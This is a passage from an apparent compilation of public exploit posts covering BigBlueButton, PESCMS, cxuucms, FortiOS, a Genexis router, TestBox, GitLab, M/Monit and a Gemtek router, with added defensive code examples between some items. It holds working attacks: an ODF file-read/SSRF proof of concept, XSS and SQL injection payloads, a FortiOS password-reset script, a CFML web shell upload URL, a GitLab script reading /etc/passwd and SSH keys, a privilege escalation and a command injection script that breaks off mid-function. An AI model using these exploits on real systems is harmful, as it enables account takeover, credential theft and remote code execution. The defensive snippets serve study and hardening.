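Note that the `b'12345678'` challenge the post's `restore()` uses passes the patched check, which is why restoring still works against a patched DC while the all-zero attempt does not; enforcing secure RPC on the DC (the second stage of Microsoft's rollout) is what closes the remaining downgrade path.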
  6. # Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery # Date: 2020-09-11 # Exploit Author: RedTeam Pentesting GmbH # Vendor Homepage: https://bigbluebutton.org/ # Version: BigBlueButton 2.2.25 RedTeam Pentesting discovered a vulnerability in the BigBlueButton web conferencing system which allows participants of a conference with permissions to upload presentations to read arbitrary files from the file system and perform server-side requests. This leads to administrative access to the BigBlueButton instance. Details ======= Product: BigBlueButton Affected Versions: 2.2.25, potentially earlier versions as well Fixed Versions: 2.2.27 Vulnerability Type: Arbitrary File Disclosure and Server-Side Request Forgery Security Risk: medium Vendor URL: https://bigbluebutton.org/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005 Advisory Status: published CVE: CVE-2020-25820 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820 Introduction ============ "BigBlueButton is a web conferencing system designed for online learning." (from the vendor's homepage) More Details ============ BigBlueButton is a web conferencing system that allows participants with the appropriate privileges to upload files in various formats to be used as presentation slides. Among other formats, BigBlueButton accepts LibreOffice documents[1]. LibreOffice documents use the XML-based Open Document Format for Office Applications (ODF)[2]. For technical purposes, uploaded files are converted to PDF format with LibreOffice and afterwards to SVG for displaying[6]. The ODF file format supports using the XML Linking Language (XLink) to create links between documents[3]. When local files are referenced using XLinks, the contents of the respective files are included in the generated PDF file when BigBlueButton converts ODF documents with LibreOffice. 
This leads to an arbitrary file disclosure vulnerability, allowing malicious participants of conferences to extract files from the BigBlueButton server's file system. LibreOffice also embeds XLinks to remote locations when a document is converted, which allows to perform server-side requests. Proof of Concept ================ Start from an empty ODF Text Document and extract the content: $ mkdir tmp-doc && cd tmp-doc $ unzip ../empty.odt Archive: empty.odt extracting: mimetype creating: Configurations2/accelerator/ creating: Configurations2/images/Bitmaps/ creating: Configurations2/toolpanel/ creating: Configurations2/progressbar/ creating: Configurations2/statusbar/ creating: Configurations2/toolbar/ creating: Configurations2/floater/ creating: Configurations2/popupmenu/ creating: Configurations2/menubar/ inflating: manifest.rdf inflating: meta.xml inflating: settings.xml extracting: Thumbnails/thumbnail.png inflating: styles.xml inflating: content.xml inflating: META-INF/manifest.xml Replace the <office:body> element in the file content.xml with the following: <office:body> <office:text> <text:section text:name="string"> <text:section-source xlink:href="file:///etc/passwd" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/> </text:section> </office:text> </office:body> The text document now includes a section that references the external file /etc/passwd. Create an new ODF Text Document with the modified content: $ zip -r ../modified.odt * The document can now be uploaded as a presentation. After the conversion, the presentation shows the contents of the file /etc/passwd from the system running the BigBlueButton conferencing software. 
To perform server-side requests, substitute the xlink:href attribute's value with a remote URL such as http://example.com: <office:body> <office:text> <text:section text:name="string"> <text:section-source xlink:href="http://example.com" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/> </text:section> </office:text> </office:body> When converting a document with this content, LibreOffice will fetch the website's content and embed it into the generated PDF file. Workaround ========== To work around this issue, the conversion feature should be disabled if it is not used. Otherwise, permission to upload presentations should only be given to trusted users. Additionally, the allowed file types for upload can be restricted to just PDF files. Fix === Update to fixed version 2.2.27. Change API key after update. Security Risk ============= As shown, the presentation conversion feature of BigBlueButton can be used to disclose arbitrary local files. Through the file disclosure, attackers can gain access to the credentials of the BigBlueButton instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties, /usr/share/bbb-apps-akka/conf/application.conf), which allows for administrative access to BigBlueButton through its API (see [5]), including all conferences. Additionally, it is possible to perform server-side requests. Note that this vulnerability is different from CVE-2018-10583 [4], because the risk is not the disclosure of credentials sent while fetching remote resources, but the ability to access resources that are in the same network segment as the BigBlueButton instance, which is possibly not accessible from the Internet. To exploit this vulnerability, attackers need to have access to a conference with the ability to upload presentations. 
While successful exploitation of this vulnerability would pose severe consequences for the affected BigBlueButton instance, it is only rated to pose a medium risk due to the requirement of having presentator access. Timeline ======== 2020-09-11 Vulnerability identified 2020-09-18 Customer approved disclosure to vendor 2020-09-22 CVE ID requested 2020-09-22 CVE ID assigned 2020-09-24 Requested encrypted communication with vendor 2020-09-25 Vendor unable to provide encrypted communication, Vendor notified 2020-09-25 Vendor confirmed being able to reproduce vulnerability, mentioned similar bugreport 2020-09-25 Requested information whether "similar burgreport" uses the same vulnerability - no answer 2020-10-13 Again requested information whether "similar burgreport" uses the same vulnerability, whether release shedule is known - no answer 2020-10-14 Vendor released fixed version (without mentioning vulnerability) 2020-10-21 Vulnerability published by third party [7] 2020-10-21 Advisory released References ========== [1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton [2] http://opendocumentformat.org/ [3] https://www.w3.org/TR/xlink11/ [4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583 [5] https://docs.bigbluebutton.org/dev/api.html#usage [6] https://docs.bigbluebutton.org/support/faq.html#presentations [7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. 
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
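The Workaround section of the advisory above either disables conversion or trusts the uploader; neither looks at the document itself. The following is an added example, not BigBlueButton code and not part of the RedTeam Pentesting advisory: a pre-conversion gate that opens the uploaded OpenDocument file (a zip whose content.xml holds the body) and refuses it when any text:section is linked to an xlink:href, which is the element the advisory uses for both the local file read and the server-side request. The sample documents are constructed inline; the element and attribute names are the ones shown in the advisory.

```python
"""Refuse to convert OpenDocument files whose sections are linked to an external URI.

Added example; not BigBlueButton code and not from the advisory. An ODT/ODP
is a zip archive whose content.xml holds the document body; the
text:section-source element with an xlink:href (shown in the advisory) makes
LibreOffice pull the linked resource in during conversion. The sample
documents below are constructed inline.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

NS_OFFICE = "urn:oasis:names:tc:opendocument:xmlns:office:1.0"
NS_TEXT = "urn:oasis:names:tc:opendocument:xmlns:text:1.0"
NS_XLINK = "http://www.w3.org/1999/xlink"


def find_external_sections(odf_bytes):
    """Return [(section_name, href, kind)] for every section linked to an external source."""
    with zipfile.ZipFile(io.BytesIO(odf_bytes)) as zf:
        # For fully untrusted input parse with defusedxml instead of plain ElementTree.
        root = ET.fromstring(zf.read("content.xml"))
    findings = []
    for section in root.iter(f"{{{NS_TEXT}}}section"):
        name = section.get(f"{{{NS_TEXT}}}name", "")
        for source in section.findall(f"{{{NS_TEXT}}}section-source"):
            href = source.get(f"{{{NS_XLINK}}}href")
            if href is None:
                continue
            scheme = urlsplit(href).scheme.lower()
            if scheme in ("http", "https", "ftp"):
                kind = "server-side request"
            elif scheme == "file" or (scheme == "" and href.startswith("/")):
                kind = "local file read"
            else:
                kind = "external link"
            findings.append((name, href, kind))
    return findings


def is_safe_to_convert(odf_bytes):
    """Gate to put in front of the LibreOffice conversion step."""
    return not find_external_sections(odf_bytes)


def build_odt(section_href=None):
    """Constructed minimal ODT: mimetype plus a content.xml with one section."""
    source = ""
    if section_href is not None:
        source = (f'<text:section-source xlink:href="{section_href}" xlink:type="simple" '
                  'xlink:show="embed" xlink:actuate="onLoad"/>')
    content = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<office:document-content xmlns:office="{NS_OFFICE}" '
        f'xmlns:text="{NS_TEXT}" xmlns:xlink="{NS_XLINK}">'
        '<office:body><office:text>'
        f'<text:section text:name="string">{source}<text:p>hello</text:p></text:section>'
        '</office:text></office:body></office:document-content>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", content)
    return buf.getvalue()


if __name__ == "__main__":
    for href in (None, "file:///etc/passwd", "http://example.com"):
        doc = build_odt(href)
        print(href, find_external_sections(doc),
              "convert" if is_safe_to_convert(doc) else "reject")
```

Linked sections are flagged regardless of scheme, because a presentation upload has no legitimate reason to pull content from elsewhere; the kind is only reported to tell a file read from a request in the logs.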
7. # Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.pescms.com/
# Software Link: https://github.com/lazyphp/PESCMS-TEAM
# Version: PESCMS Team 2.3.2
# CVE: CVE-2020-28092

PESCMS Team 2.3.2 has multiple reflected XSS via the id parameter:

?g=Team&m=Task&a=my&status=3&id=
?g=Team&m=Task&a=my&status=0&id=
?g=Team&m=Task&a=my&status=1&id=
?g=Team&m=Task&a=my&status=10&id=

Please refer to: https://github.com/lazyphp/PESCMS-TEAM/issues/6

Payload supplied in the id parameter:

"><ScRiPt>alert(1)</ScRiPt>
8. # Exploit Title: xuucms 3 - 'keywords' SQL Injection
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.cxuu.top/
# Software Link: https://github.com/cbkhwx/cxuucmsv3
# Version: cxuucms - v3
# CVE : CVE-2020-28091

SQL injection exists in search.php via the keywords parameter. For details, please refer to:
https://github.com/cbkhwx/cxuucmsv3/issues/1

Confirm with sqlmap (time-based blind technique):

sqlmap -u 'http://localhost/search.php?keywords=12345678' --dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o --batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36' -b --current-db --hostname
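The post only shows the sqlmap invocation. As an added example (not cxuucms code; the table and rows are constructed here, and only the parameter name keywords is taken from the post), the following shows the string-built search query that makes this class of bug possible next to its parameterised form, using an in-memory SQLite database so it runs offline:

```python
"""String-built search query beside its parameterised form.

Added example; the posts table and its rows are constructed here and are not
from cxuucms. Only the parameter name `keywords` comes from the post.
"""
import sqlite3


def make_db():
    """Constructed sample data: two public rows and one row that must never be listed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, secret INTEGER)")
    conn.executemany("INSERT INTO posts (title, secret) VALUES (?, ?)", [
        ("public notice", 0),
        ("internal memo", 1),
        ("12345678 release", 0),
    ])
    return conn


def search_vulnerable(conn, keywords):
    """Concatenation: the caller's input becomes part of the SQL grammar."""
    sql = "SELECT title FROM posts WHERE secret = 0 AND title LIKE '%" + keywords + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, keywords):
    """Bound parameter: the input is only ever a value compared by LIKE."""
    sql = "SELECT title FROM posts WHERE secret = 0 AND title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + keywords + "%",))]


if __name__ == "__main__":
    conn = make_db()
    # A quote closes the pattern, OR widens the filter, -- discards the rest of the query.
    payload = "x%' OR secret=1 --"
    print("vulnerable:", search_vulnerable(conn, payload))
    print("safe      :", search_safe(conn, payload))
```

The vulnerable function returns the secret row for the payload because the closing quote and the trailing comment rewrite the WHERE clause; the bound version returns nothing, since the whole string is just an unmatched LIKE pattern.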
9. # Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
# Google Dork: intitle:"Please Login" "Use FTM Push"
# Date: 15/11/2020
# Exploit Author: Ricardo Longatto
# Details: This exploit allows changing a user's password from the SSL VPN web portal
# Vendor Homepage: https://www.fortinet.com/
# Version: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10
# Tested on: 6.0.4
# NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382
# CVE : CVE-2018-13382
# Credits: Vulnerability by Meh Chang and Orange Tsai.

#!/usr/bin/env python
import requests, urllib3, sys, re, argparse

urllib3.disable_warnings()

menu = argparse.ArgumentParser(description="[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]")
menu.add_argument('-t', metavar='Target/Host IP', required=True)
menu.add_argument('-p', metavar='Port', required=True)
menu.add_argument('-u', metavar='User', required=True)
menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d',
                  help='set the password for the user; if not given, the password is set to h4ck3d')
op = menu.parse_args()

host = op.t
port = op.p
user = op.u
setpass = op.setpass

url = "https://" + host + ":" + port + "/remote/logincheck"

# The 'magic' parameter lets the password-change handler be reached without authenticating.
exploit = {'ajax': '1', 'username': user, 'magic': '4tinet2095866', 'credential': setpass}

r = requests.post(url, verify=False, data=exploit)

if re.search("/remote/hostcheck_install", r.text):
    print("[+] - The new password for [" + user + "] is " + setpass + " <<<< [+]")
else:
    print("Exploit Failed. :/")
10. # Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
# Date: 17th November 2020
# Exploit Author: Nitesh Surana
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Version: P4410-V2-1.34H
# Tested on: Windows/Kali
# CVE : CVE-2020-25988

import upnpy

upnp = upnpy.UPnP()

# Discover UPnP devices on the network
# Returns a list of devices e.g.: [Device <Econet IGD>]
devices = upnp.discover()

# Select the device directly from the list
device = devices[0]

# Get the services available for this device
# Returns a list of services available for the device
# device.get_services()

# We can now access a specific service on the device by its ID like a dictionary
service = device['DeviceInfo1']

# Execute the action by its name (in our case, the 'X_GetAccess' action)
# Returns a dictionary containing the cleartext password of the 'admin' user.
print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))
11. # Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
# Author: Darren King
# Date: 2020-07-23
# Vendor Homepage: https://www.ortussolutions.com/products/testbox
# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
# Version : 2.4.0 through to 4.1.0
# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61

About TestBox
------------------------
TestBox is an open source testing framework for ColdFusion (CFML). It is written and
maintained by Ortus Solutions, and can be downloaded/installed as a stand-alone package
as well as being distributed as part of Ortus' ColdBox CFML MVC framework
(https://www.coldbox.org/).

TestBox is normally deployed in directories "/testbox" (or "/test") under the root of
the corresponding ColdFusion/ColdBox application, and allows users to run CFML unit
tests and to generate reports.

https://www.ortussolutions.com/products/testbox
https://github.com/Ortus-Solutions/testbox

As per the vendor, TestBox is meant for development & testing purposes only and should
not be deployed to production environments.

Arbitrary File Write & RCE
------------------------
The file testbox/system/runners/HTMLRunner.cfm writes a file whose directory, name and
part of its content are taken from the query string, which can be exploited to obtain
remote code execution on the remote host. The block below shows the vulnerable code:

HTMLRunner.cfm, lines 51-73:

// Write TEST.properties in report destination path.
if( url.propertiesSummary ){
    testResult = testbox.getResult();
    errors = testResult.getTotalFail() + testResult.getTotalError();
    savecontent variable="propertiesReport"{
        writeOutput( ( errors ? "test.failed=true" : "test.passed=true" ) & chr( 10 ) );
        writeOutput( "test.labels=#arrayToList( testResult.getLabels() )#
test.bundles=#URL.bundles#
test.directory=#url.directory#
total.bundles=#testResult.getTotalBundles()#
total.suites=#testResult.getTotalSuites()#
total.specs=#testResult.getTotalSpecs()#
total.pass=#testResult.getTotalPass()#
total.fail=#testResult.getTotalFail()#
total.error=#testResult.getTotalError()#
total.skipped=#testResult.getTotalSkipped()#" );
    }

    //ACF Compatibility - check for and expand to absolute path
    if( !directoryExists( url.reportpath ) )
        url.reportpath = expandPath( url.reportpath );

    fileWrite( url.reportpath & "/" & url.propertiesFilename, propertiesReport );
}

If the "propertiesSummary" query string parameter is specified, the CFM page writes a
properties file to the specified path with a summary of the tests performed. The
reportpath and propertiesFilename values are both supplied as query string parameters
and are unvalidated, meaning that the user can supply an arbitrary filename and have the
application output a CFM file (i.e. propertiesFilename=evil.cfm) within the path of the
application.

The user can also specify the "labels" to apply to the test (via the "labels" query
string parameter), which are included in the written properties file. Again, these
labels are unvalidated and not sanitized, allowing arbitrary CFML tags and script to be
passed to the code. When the properties are output to a CFM file (as per the
propertiesFilename parameter), the written CFM can then be accessed via the browser and
any corresponding CFML tags will be executed by the CFML server.

(Note that Adobe ColdFusion often runs as the System user on Windows, which means it
might be possible to achieve remote code execution as System in these circumstances.)

Sample URL to write local CFM file:

http://<HOST>/testbox/system/runners/HTMLRunner.cfm?propertiesSummary=true&reportpath=../runners&propertiesFilename=exec.cfm&labels=<pre><cfexecute name="%23url.cmd%23" arguments="%23url.args%23" timeout="5"></cfexecute></pre>

Sample URL to confirm:

http://<HOST>/testbox/system/runners/exec.cfm?cmd=whoami&args=/all

Versions Affected
------------------------
Versions affected (and platform tested on):

- Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
- Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)

Timeline
------------------------
2020-07-23 - Reserved CVEs
2020-08-04 - Disclosed issues to vendor
2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
12. # Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
# Google Dork: -
# Date: 11/15/2020
# Exploit Author: Jasper Rasenberg
# Vendor Homepage: https://about.gitlab.com
# Software Link: https://about.gitlab.com/install
# Version: tested on gitlab version 12.9.0
# Tested on: Kali Linux 2020.3

# You can create as many personal access tokens as you like from your GitLab profile.
#   Sign in to GitLab.
#   In the upper-right corner, click your avatar and select Settings.
#   On the User Settings menu, select Access Tokens.
#   Choose a name and optional expiry date for the token.
#   Choose the desired scopes.
#   Click the Create personal access token button.
#   Save the personal access token somewhere safe. If you navigate away or refresh your
#   page, and you did not save the token, you must create a new one.
# REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

# pip3 install python-gitlab   (provides the 'gitlab' module imported below)
# pip3 install requests
# Use a client cert to verify SSL or set to False

import os
import requests
from time import sleep
from gitlab import Gitlab

session = requests.Session()
session.verify = f'{os.getcwd()}/<cert.pem>'  # or set session.verify = False

host = ''   # base URL of the GitLab instance
token = ''  # personal access token created as described above


def exploit(projectName, issueTitle, files, token):
    gl = Gitlab(host, private_token=token, session=session)
    gl.auth()
    # Two projects: the issue is created in the first and moved to the second.
    # Moving an issue makes GitLab copy the uploads referenced in its description,
    # and the path traversal in the upload link makes that copy read an arbitrary file.
    p1 = gl.projects.create({'name': f"{projectName}-1"})
    p2 = gl.projects.create({'name': f"{projectName}-2"})
    for i, f in enumerate(files):
        stripped_f = f.rstrip('\n')
        issue = p1.issues.create({
            'title': f"{issueTitle}-{i}",
            'description':
                "![a](/uploads/11111111111111111111111111111111/"
                f"../../../../../../../../../../../../../..{stripped_f})"})
        print(issue.description)
        sleep(3)
        try:
            issue.move(p2.id)
        except Exception:
            pass
        sleep(3)


if __name__ == "__main__":
    write_files = ['/etc/passwd', '~/.ssh/id_rsa']
    with open('sensitive_files', 'w') as sens:
        for file in write_files:
            sens.write(file + '\n')
    files = list(open('sensitive_files', 'r'))
    exploit('project-1', 'issue-1', files, token)
13. # Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal
# Author: Darren King
# Date: 2020-07-23
# Vendor Homepage: https://www.ortussolutions.com/products/testbox
# Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0
# Version : 2.3.0 through to 4.1.0
# Tested on: Adobe ColdFusion 11, Adobe ColdFusion 2016, Adobe ColdFusion 2018, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61

About TestBox
------------------------
TestBox is an open source testing framework for ColdFusion (CFML). It is written and
maintained by Ortus Solutions, and can be downloaded/installed as a stand-alone package
as well as being distributed as part of Ortus' ColdBox CFML MVC framework
(https://www.coldbox.org/).

TestBox is normally deployed in directories "/testbox" (or "/test") under the root of
the corresponding ColdFusion/ColdBox application, and allows users to run CFML unit
tests and to generate reports.

https://www.ortussolutions.com/products/testbox
https://github.com/Ortus-Solutions/testbox

As per the vendor, TestBox is meant for development & testing purposes only and should
not be deployed to production environments.

Directory Traversal
------------------------
The TestBox "test-browser" page does not adequately sanitise the "path" QueryString
parameter, allowing an attacker to perform a directory traversal on the page by
specifying the value "path=/../" (appending '../' all the way up to the system root).

Sample URL:

http://<HOST>/testbox/test-browser/index.cfm?path=/../

Versions Affected
------------------------
Versions affected (and platform tested on):

- Testbox-4.1.0+384-202005272329 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Coldbox-6.0.0-snapshot [2020-07-23] / Lucee 5.3.6.61)
- Testbox-3.1.0+339-201909272036 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-3.0.0+309-201905040706 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.5.0+107-201705171812 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)
- Testbox-2.4.0+80-201612030044 (Adobe ColdFusion 2018, Adobe ColdFusion 2016, Adobe ColdFusion 11)

Timeline
------------------------
2020-07-23 - Reserved CVEs
2020-08-04 - Disclosed issues to vendor
2020-08-04 - Response from vendor - not an issue. TestBox is a testing framework and is not meant to be deployed in production.
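Both TestBox posts (11, the file write through HTMLRunner.cfm, and 13, the traversal through test-browser) come down to the same missing check: a user-supplied path is joined to a base directory without confirming the result stays inside it. The following is an added example, written in Python rather than TestBox's own CFML and not project code, of the containment and allowlist checks those two pages lack. The report root and test root paths are assumptions; the parameter names are the ones from the posts.

```python
"""Containment checks for the TestBox parameters abused in posts 11 and 13.

Added example written in Python rather than TestBox's own CFML; it is not
project code. The report root and test root paths are assumptions; the
parameter names (reportpath, propertiesFilename, labels, path) are the ones
from the posts.
"""
import os
import re

PROPERTIES_NAME = re.compile(r"^[A-Za-z0-9_.-]+\.properties$")
LABEL = re.compile(r"^[A-Za-z0-9_-]+$")


def resolve_inside(base_dir, user_path):
    """Resolve user_path beneath base_dir and refuse anything that escapes it.
    Leading slashes are dropped so an absolute path is treated as relative to
    base_dir; realpath then folds any ../ (and symlinks) before the comparison."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"{user_path!r} escapes {base_dir}")
    return target


def safe_report_file(report_root, reportpath, properties_filename):
    """HTMLRunner.cfm: the file must stay under the report root and keep a
    .properties name, which rules out writing exec.cfm next to the runner."""
    if not PROPERTIES_NAME.match(properties_filename):
        raise ValueError("propertiesFilename must be a plain *.properties file name")
    return os.path.join(resolve_inside(report_root, reportpath), properties_filename)


def safe_labels(labels):
    """HTMLRunner.cfm: labels end up in the written file, so allow only plain tokens."""
    items = [l.strip() for l in labels.split(",") if l.strip()]
    bad = [l for l in items if not LABEL.match(l)]
    if bad:
        raise ValueError(f"rejected labels: {bad}")
    return items


def safe_browse_path(test_root, path):
    """test-browser/index.cfm: the browsed directory must stay under the test root."""
    return resolve_inside(test_root, path)


if __name__ == "__main__":
    print(safe_report_file("/srv/testbox/results", "reports", "TEST.properties"))
    for args in (("../runners", "exec.cfm"), ("../runners", "x.properties")):
        try:
            safe_report_file("/srv/testbox/results", *args)
        except ValueError as e:
            print("rejected:", e)
    try:
        safe_browse_path("/srv/testbox/tests", "/../")
    except ValueError as e:
        print("rejected:", e)
```

The filename allowlist alone would already stop the CFM write; the containment check is what also stops the traversal, and applying both means a future bypass of one still has to get past the other.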
14. # Title: M/Monit 3.7.4 - Privilege Escalation
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(url)


def login():
    print('Attempting to login...')
    data = {
        'z_username': username,
        'z_password': password
    }
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    resp = sess.post(url + '/z_security_check', data=data, headers=headers)
    if resp.ok:
        print('Logged in successfully.')
    else:
        print('Could not login.')
        sys.exit(1)


def privesc():
    # The update endpoint accepts the 'admin' flag from a non-administrative user.
    data = {
        'uname': username,
        'fullname': username,
        'password': password,
        'admin': 1
    }
    resp = sess.post(url + '/api/1/admin/users/update', data=data)
    if resp.ok:
        print('Escalated to administrator.')
    else:
        print('Unable to escalate to administrator.')
    return


if __name__ == '__main__':
    login()
    privesc()
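The escalation above works because the update handler copies the posted admin field into the user record for any caller. As an added example, not M/Monit code, the following models that handler twice: once copying every posted field, and once allowlisting fields per caller role. The field names are the ones the exploit posts; the in-memory user table is constructed here.

```python
"""Allowlisting request fields on a user-update handler.

Added example, not M/Monit code. The field names (uname, fullname, password,
admin) are the ones the exploit above posts; the in-memory user table and the
two handlers are constructed here.
"""


def make_users():
    """Constructed user table: one administrator and the low-privilege 'test' account."""
    return {
        "admin": {"fullname": "Administrator", "password": "s3cret", "admin": 1},
        "test": {"fullname": "test", "password": "test123", "admin": 0},
    }


def update_user_vulnerable(users, caller, form):
    """Copies every posted field into the record: 'admin': 1 is accepted from anyone."""
    user = users[form["uname"]]
    user.update({k: v for k, v in form.items() if k != "uname"})
    return user


SELF_EDITABLE = {"fullname", "password"}
ADMIN_EDITABLE = SELF_EDITABLE | {"admin"}


def update_user_safe(users, caller, form):
    """Only administrators may touch other accounts or the admin flag; every other
    posted field is dropped and reported back so the client can see what was ignored."""
    target = form["uname"]
    is_admin = bool(users[caller]["admin"])
    if target != caller and not is_admin:
        raise PermissionError(f"{caller} may only edit their own account")
    allowed = ADMIN_EDITABLE if is_admin else SELF_EDITABLE
    rejected = sorted(set(form) - allowed - {"uname"})
    for key in allowed & set(form):
        users[target][key] = form[key]
    return users[target], rejected


if __name__ == "__main__":
    form = {"uname": "test", "fullname": "test", "password": "test123", "admin": 1}
    print("vulnerable:", update_user_vulnerable(make_users(), "test", form))
    print("safe      :", update_user_safe(make_users(), "test", form))
```

The allowlist is keyed on the caller's stored role, not on anything in the request, which is the property the vulnerable handler lacks.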
15. # Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
# Date: 13/09/2020
# Exploit Author: Gabriele Zuddas
# Version: 01.01.02.127, 01.01.02.141
# CVE : CVE-2020-24365

"""
Service Provider : Linkem
Product Name : LTE CPE
Model ID : WVRTM-127ACN
Serial ID : GMK170418011089
IMEI : XXXXXXXXXXXXX
ICCID : XXXXXXXXXXXXXXXXXX
Firmware Version : 01.01.02.141
Firmware Creation Date : May 15 13:04:30 CST 2019
Bootrom Version : U-Boot 1.1.3
Bootrom Creation Date : Oct 23 2015 - 16:03:05
LTE Support Band : 42,43

Injection happens here (the diagnostic address is interpolated into a shell command line):

sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&

Exploit has been tested on older versions too:

Firmware Version: 01.01.02.127
Firmware Creation Date : May 23 15:34:10 CST 2018
"""

import requests, time, argparse, re, sys


class Exploit():
    CVE = "CVE-2020-24365"

    def __init__(self, args):
        self.args = args
        self.session = requests.Session()

    def login(self):
        s = self.session
        r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login",
                   data={"user_name": self.args.username, "user_passwd": self.args.password})
        if "sid" not in s.cookies:
            print("[!] Login failed.")
            exit(1)
        sid = s.cookies["sid"]
        s.headers = {"sid": sid}
        print(f"[*] Login successful! (sid={sid})")

    def now(self):
        return int(time.time() * 1000)

    def start_url(self):
        return (f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp"
                f"&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}")

    def exploit(self, command):
        self.login()
        s = self.session
        # The command goes into mon_diag_addr wrapped in $(...); the firmware interpolates
        # it into the sh -c line shown above, so the shell expands it in place of the target.
        payload = (f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp"
                   f"&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)"
                   f"&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops="
                   f"&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}")
        r = s.get(payload)
        r = s.get(self.start_url())
        content = str(r.content, "utf8")
        # Attempt to stop the command as some commands tend to get stuck
        # (if commands stop working check on the web interface)
        r = s.get(payload)
        r = s.get(self.start_url())
        content = str(r.content, "utf8")
        # The command output comes back inside ping's "bad address" error message.
        c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content)
        print(content)
        if len(c) > 0:
            print(c[0])
            return c[0]
        return False

    def download_file(self, url):
